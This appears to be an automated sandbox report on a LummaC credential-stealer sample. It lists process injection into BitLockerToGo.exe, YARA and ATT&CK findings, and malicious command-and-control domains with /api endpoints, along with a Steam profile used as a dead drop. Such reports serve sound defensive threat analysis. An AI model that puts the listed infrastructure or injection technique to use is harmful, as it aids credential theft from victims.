Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_00406ED0	2_2_00406ED0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 2_2_0041DFA6	2_2_0041DFA6

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: String function: 0041D4A0 appears 156 times
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: String function: 0040C7F0 appears 48 times

Source: webNY0O9Sr.exe, 00000000.00000002.2258275643.000000000279C000.00000004.00001000.00020000.00000000.sdmp

Binary or memory string: OriginalFilenameBITLOCKERTOGO.EXEj% vs webNY0O9Sr.exe

Source: webNY0O9Sr.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 00000000.00000002.2258275643.0000000002400000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
Source: 00000000.00000002.2258275643.00000000024DC000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research

Source: classification engine

Classification label: mal93.troj.evad.winEXE@3/0@11/3

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Code function: 2_2_00435000 CoCreateInstance,

2_2_00435000

Source: webNY0O9Sr.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\webNY0O9Sr.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: webNY0O9Sr.exe

ReversingLabs: Detection: 31%

Source: webNY0O9Sr.exe	String found in binary or memory: net/addrselect.go
Source: webNY0O9Sr.exe	String found in binary or memory: github.com/saferwall/pe@v1.5.4/loadconfig.go

Source: unknown	Process created: C:\Users\user\Desktop\webNY0O9Sr.exe "C:\Users\user\Desktop\webNY0O9Sr.exe"
Source: C:\Users\user\Desktop\webNY0O9Sr.exe	Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
Source: C:\Users\user\Desktop\webNY0O9Sr.exe	Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"	Jump to behavior

Source: C:\Users\user\Desktop\webNY0O9Sr.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\webNY0O9Sr.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Users\user\Desktop\webNY0O9Sr.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: webNY0O9Sr.exe

Static PE information: certificate valid

Source: webNY0O9Sr.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: webNY0O9Sr.exe

Static file information: File size 11801336 > 1048576

Source: webNY0O9Sr.exe	Static PE information: Raw size of .text is bigger than: 0x100000 < 0x34fc00
Source: webNY0O9Sr.exe	Static PE information: Raw size of .rdata is bigger than: 0x100000 < 0x765c00

Source: webNY0O9Sr.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:	Binary string: BitLockerToGo.pdb source: webNY0O9Sr.exe, 00000000.00000002.2258275643.000000000279C000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: BitLockerToGo.pdbGCTL source: webNY0O9Sr.exe, 00000000.00000002.2258275643.000000000279C000.00000004.00001000.00020000.00000000.sdmp

Source: webNY0O9Sr.exe

Static PE information: section name: .symtab

Source: C:\Users\user\Desktop\webNY0O9Sr.exe

Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

Jump to behavior

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe TID: 3176

Thread sleep time: -60000s >= -30000s

Jump to behavior

Source: webNY0O9Sr.exe, 00000000.00000002.2255204164.0000000001A3B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllZ
Source: BitLockerToGo.exe, 00000002.00000003.2291005847.000000000313D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.2291978726.00000000030FC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.2292152359.000000000313D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2289372897.00000000030FC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Code function: 2_2_00448250 LdrInitializeThunk,

2_2_00448250

HIPS / PFW / Operating System Protection Evasion

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\webNY0O9Sr.exe

Memory allocated: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000 protect: page execute and read and write

Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\webNY0O9Sr.exe

Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000 value starts with: 4D5A

Jump to behavior

LummaC encrypted strings found

Source: webNY0O9Sr.exe, 00000000.00000002.2258275643.00000000025D4000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: delaylacedmn.site
Source: webNY0O9Sr.exe, 00000000.00000002.2258275643.00000000025D4000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: writekdmsnu.site
Source: webNY0O9Sr.exe, 00000000.00000002.2258275643.00000000025D4000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: agentyanlark.site
Source: webNY0O9Sr.exe, 00000000.00000002.2258275643.00000000025D4000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: bellykmrebk.site
Source: webNY0O9Sr.exe, 00000000.00000002.2258275643.00000000025D4000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: underlinemdsj.site
Source: webNY0O9Sr.exe, 00000000.00000002.2258275643.00000000025D4000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: commandejorsk.site
Source: webNY0O9Sr.exe, 00000000.00000002.2258275643.00000000025D4000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: possiwreeste.site
Source: webNY0O9Sr.exe, 00000000.00000002.2258275643.00000000025D4000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: famikyjdiag.site
Source: webNY0O9Sr.exe, 00000000.00000002.2258275643.00000000025D4000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: nurserrsjwuwq.shop

Writes to foreign memory regions

Source: C:\Users\user\Desktop\webNY0O9Sr.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 2E50008	Jump to behavior
Source: C:\Users\user\Desktop\webNY0O9Sr.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\webNY0O9Sr.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 401000	Jump to behavior
Source: C:\Users\user\Desktop\webNY0O9Sr.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 44E000	Jump to behavior
Source: C:\Users\user\Desktop\webNY0O9Sr.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 451000	Jump to behavior
Source: C:\Users\user\Desktop\webNY0O9Sr.exe	Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 461000	Jump to behavior

Source: C:\Users\user\Desktop\webNY0O9Sr.exe

Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"

Jump to behavior

Source: C:\Users\user\Desktop\webNY0O9Sr.exe	Queries volume information: C:\Windows VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\webNY0O9Sr.exe	Queries volume information: C:\Windows\AppReadiness VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\webNY0O9Sr.exe	Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\webNY0O9Sr.exe	Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation	Jump to behavior

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: 2.2.BitLockerToGo.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.BitLockerToGo.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.webNY0O9Sr.exe.25d4000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.webNY0O9Sr.exe.25d4000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2258275643.00000000025D4000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2258275643.0000000002577000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2291496488.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: 2.2.BitLockerToGo.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.BitLockerToGo.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.webNY0O9Sr.exe.25d4000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.webNY0O9Sr.exe.25d4000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2258275643.00000000025D4000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2258275643.0000000002577000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2291496488.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Command and Scripting Interpreter	1 DLL Side-Loading	311 Process Injection	1 Virtualization/Sandbox Evasion	OS Credential Dumping	1 Security Software Discovery	Remote Services	1 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 PowerShell	Boot or Logon Initialization Scripts	1 DLL Side-Loading	311 Process Injection	LSASS Memory	1 Virtualization/Sandbox Evasion	Remote Desktop Protocol	2 Clipboard Data	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	11 Deobfuscate/Decode Files or Information	Security Account Manager	12 System Information Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	2 Obfuscated Files or Information	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	114 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	Internet Connection Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
webNY0O9Sr.exe	32%	ReversingLabs

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&l=english	0%	URL Reputation	safe
https://help.steampowered.com/en/	0%	URL Reputation	safe
https://store.steampowered.com/news/	0%	URL Reputation	safe
https://store.steampowered.com/subscriber_agreement/	0%	URL Reputation	safe
http://store.steampowered.com/subscriber_agreement/	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=en	0%	URL Reputation	safe
http://www.valvesoftware.com/legal.htm	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png	0%	URL Reputation	safe
https://store.steampowered.com/stats/	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1	0%	URL Reputation	safe
https://store.steampowered.com/steam_refunds/	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&	0%	URL Reputation	safe
https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL	0%	URL Reputation	safe
https://store.steampowered.com/legal/	0%	URL Reputation	safe
http://www.certum.pl/CPS0	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=e	0%	URL Reputation	safe
https://steamcommunity.com/profiles/76561199724331900	100%	URL Reputation	malware
https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=engl	0%	URL Reputation	safe
http://store.steampowered.com/privacy_agreement/	0%	URL Reputation	safe
https://store.steampowered.com/points/shop/	0%	URL Reputation	safe
https://store.steampowered.com/	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw	0%	URL Reputation	safe
https://www.certum.pl/CPS0	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif	0%	URL Reputation	safe
https://steamcommunity.com/profiles/76561199724331900/inventory/	100%	URL Reputation	malware
https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg	0%	URL Reputation	safe
https://store.steampowered.com/privacy_agreement/	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=english	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english	0%	URL Reputation	safe
http://store.steampowered.com/account/cookiepreferences/	0%	URL Reputation	safe
https://store.steampowered.com/mobile	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/javascript/profile.js?v=f3vWO7swdDqp&l=english	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC	0%	URL Reputation	safe
https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=f2hMA1v9Zkc8&l=engl	0%	URL Reputation	safe
https://store.steampowered.com/about/	0%	URL Reputation	safe
https://steamcommunity.com/profiles/76561199724331900/badges	100%	URL Reputation	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
steamcommunity.com	104.102.49.254	true	false	unknown
gravvitywio.store	172.67.209.193	true	true	unknown
nurserrsjwuwq.shop	188.114.96.3	true	true	unknown
possiwreeste.site	unknown	unknown	true	unknown
commandejorsk.site	unknown	unknown	true	unknown
famikyjdiag.site	unknown	unknown	true	unknown
writekdmsnu.site	unknown	unknown	true	unknown
agentyanlark.site	unknown	unknown	true	unknown
delaylacedmn.site	unknown	unknown	true	unknown
underlinemdsj.site	unknown	unknown	true	unknown
bellykmrebk.site	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
commandejorsk.site	true		unknown
agentyanlark.site	true		unknown
https://nurserrsjwuwq.shop/api	true		unknown
https://gravvitywio.store/api	true		unknown
underlinemdsj.site	true		unknown
possiwreeste.site	true		unknown
famikyjdiag.site	true		unknown
https://steamcommunity.com/profiles/76561199724331900	true	URL Reputation: malware	unknown
bellykmrebk.site	true		unknown
writekdmsnu.site	true		unknown
delaylacedmn.site	true		unknown
nurserrsjwuwq.shop	true		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://steamcommunity.com/my/wishlist/	BitLockerToGo.exe, 00000002.00000003.2289059443.000000000319D000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&l=english	BitLockerToGo.exe, 00000002.00000003.2289059443.000000000319D000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/shared/javascript/auth_refresh.js?v=WgUxSlKTb3W1&amp	BitLockerToGo.exe, 00000002.00000003.2289059443.000000000319D000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://steamcommunity.com/?subsection=broadcasts	BitLockerToGo.exe, 00000002.00000003.2289059443.000000000319D000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://help.steampowered.com/en/	BitLockerToGo.exe, 00000002.00000003.2289059443.000000000319D000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://steamcommunity.com/market/	BitLockerToGo.exe, 00000002.00000003.2289059443.000000000319D000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://store.steampowered.com/news/	BitLockerToGo.exe, 00000002.00000003.2289059443.000000000319D000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://writekdmsnu.site/api	BitLockerToGo.exe, 00000002.00000003.2291005847.000000000313D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.2292253702.000000000314A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2291387104.0000000003149000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=8vRVyaZK	BitLockerToGo.exe, 00000002.00000003.2289059443.000000000319D000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://vault.azure.net/mysql.database.azure.comhttps://cosmos.azure.comexec:	webNY0O9Sr.exe	false		unknown
https://store.steampowered.com/subscriber_agreement/	BitLockerToGo.exe, 00000002.00000003.2289059443.000000000319D000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://store.steampowered.com/subscriber_agreement/	BitLockerToGo.exe, 00000002.00000003.2289059443.000000000319D000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org	BitLockerToGo.exe, 00000002.00000003.2289059443.000000000319D000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6	BitLockerToGo.exe, 00000002.00000003.2289059443.000000000319D000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1	BitLockerToGo.exe, 00000002.00000003.2289059443.000000000319D000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://repository.certum.pl/cevcsca2021.cer0	webNY0O9Sr.exe	false		unknown
https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=en	BitLockerToGo.exe, 00000002.00000003.2289059443.000000000319D000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=w4s3	BitLockerToGo.exe, 00000002.00000003.2289059443.000000000319D000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://www.valvesoftware.com/legal.htm	BitLockerToGo.exe, 00000002.00000003.2289059443.000000000319D000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=pvBDaFhF2LLJ&l=e	BitLockerToGo.exe, 00000002.00000003.2289059443.000000000319D000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://steamcommunity.com/discussions/	BitLockerToGo.exe, 00000002.00000003.2289059443.000000000319D000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp	BitLockerToGo.exe, 00000002.00000003.2289059443.000000000319D000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png	BitLockerToGo.exe, 00000002.00000003.2289059443.000000000319D000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://gravvitywio.store/	BitLockerToGo.exe, 00000002.00000003.2289372897.0000000003123000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2291005847.000000000313D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.2292152359.0000000003123000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.2292152359.000000000312F000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2289372897.000000000312F000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2291005847.0000000003123000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.2292253702.000000000314A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2291005847.000000000312F000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2291387104.0000000003149000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://nurserrsjwuwq.shop/x	BitLockerToGo.exe, 00000002.00000002.2291978726.00000000030E8000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://store.steampowered.com/stats/	BitLockerToGo.exe, 00000002.00000003.2289059443.000000000319D000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png	BitLockerToGo.exe, 00000002.00000003.2289059443.000000000319D000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1	BitLockerToGo.exe, 00000002.00000003.2289059443.000000000319D000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://store.steampowered.com/steam_refunds/	BitLockerToGo.exe, 00000002.00000003.2289059443.000000000319D000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&	BitLockerToGo.exe, 00000002.00000003.2289059443.000000000319D000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://subca.ocsp-certum.com02	webNY0O9Sr.exe	false		unknown
https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback	BitLockerToGo.exe, 00000002.00000003.2289059443.000000000319D000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900	BitLockerToGo.exe, 00000002.00000003.2289059443.000000000319D000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://crl.certum.pl/ctnca2.crl0l	webNY0O9Sr.exe	false		unknown
http://repository.certum.pl/ctnca2.cer09	webNY0O9Sr.exe	false		unknown
https://commandejorsk.site/api	BitLockerToGo.exe, 00000002.00000003.2291005847.000000000313D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000002.2292253702.000000000314A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000002.00000003.2291387104.0000000003149000.00000004.00000020.00020000.00000000.sdmp	false		unknown
